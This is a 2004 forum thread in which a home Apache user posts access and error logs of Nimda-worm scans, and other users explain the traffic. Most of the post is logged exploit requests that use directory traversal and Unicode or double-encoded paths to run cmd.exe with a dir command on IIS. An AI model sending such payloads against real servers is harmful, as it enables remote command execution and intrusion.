Random exe requests to apache

apc · 07-31-2004, 03:06 AM

I'm running apache just so I can have a simple little website hosted from my computer for my family and friends. Tonight I came home to the following in my logs:

In access_log:
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:51 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:51 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:51 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:51 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:51 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:51 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:51 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:51 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:52 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:52 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:52 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:52 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:52 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:52 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:52 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:52 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:36:44 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:36:46 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:36:48 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:36:52 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:36:54 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:36:56 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:36:58 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:00 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:02 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:04 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:06 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:08 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:10 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:12 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:13 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:15 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467

and in error_log:

[Fri Jul 30 22:45:51 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/scripts/root.exe
[Fri Jul 30 22:45:51 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/MSADC/root.exe
[Fri Jul 30 22:45:51 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/c/winnt/system32/cmd.exe
[Fri Jul 30 22:45:51 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/d/winnt/system32/cmd.exe
[Fri Jul 30 22:45:51 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/scripts/..%5c../winnt/system32/cmd.exe
[Fri Jul 30 22:45:51 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Fri Jul 30 22:45:51 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Fri Jul 30 22:45:51 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe
[Fri Jul 30 22:45:52 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/scripts/..\xc1\x1c../winnt/system32/cmd.exe
[Fri Jul 30 22:45:52 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/scripts/..\xc0\xaf../winnt/system32/cmd.exe
[Fri Jul 30 22:45:52 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/scripts/..\xc1\x9c../winnt/system32/cmd.exe
[Fri Jul 30 22:45:52 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/scripts/..%5c../winnt/system32/cmd.exe
[Fri Jul 30 22:45:52 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/scripts/..%2f../winnt/system32/cmd.exe
[Fri Jul 30 23:36:44 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/scripts/root.exe
[Fri Jul 30 23:36:46 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/MSADC/root.exe
[Fri Jul 30 23:36:48 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/c/winnt/system32/cmd.exe
[Fri Jul 30 23:36:52 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/d/winnt/system32/cmd.exe
[Fri Jul 30 23:36:54 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/scripts/..%5c../winnt/system32/cmd.exe
[Fri Jul 30 23:36:56 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Fri Jul 30 23:36:58 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Fri Jul 30 23:37:00 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe
[Fri Jul 30 23:37:02 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/scripts/..\xc1\x1c../winnt/system32/cmd.exe
[Fri Jul 30 23:37:06 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/scripts/..\xc0\xaf../winnt/system32/cmd.exe
[Fri Jul 30 23:37:08 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/scripts/..\xc1\x9c../winnt/system32/cmd.exe
[Fri Jul 30 23:37:13 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/scripts/..%5c../winnt/system32/cmd.exe
[Fri Jul 30 23:37:15 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/scripts/..%2f../winnt/system32/cmd.exe

it would appear to be some windows virus maybe, so hopefully it's nothing to worry about, but i wanted to get some insight from people more knowledgable than myself. also, one thing that concerned me is that there were 16 requests made by each ip but only 13 error messages generated by me

SBing · 07-31-2004, 03:08 AM

You could try searching at google for more info on the subject, these logs are generated by Win32 viruses scanning for other vunerable machines - nothing to worry about.

Just put: root.exe apache

into google and see what you come up with.

prissed · 07-31-2004, 03:19 AM

Looks like the Nimda worm, its designed to exploit IIS, but since you're running Apache, you should be okay...well, except for bandwidth, depending on how often you're getting hit.

http://www.f-secure.com/v-descs/nimda.shtml

Lleb_KCir · 07-31-2004, 08:21 AM

http://bleaklow.com/blog/archive/000009.html

from the first google.com serch on the sujestion here. great idea, im going to muddle with this over the weekend to see what i can do to drop those annoying M$ viruses from hitting my servers.

Crashed_Again · 07-31-2004, 12:39 PM

Its a lost cause to try and drop these things. My snort log is filled with them and if you ban one IP who is infected three more pop up later. The only comfort we have is knowing that this virus just doesn't work on linux servers.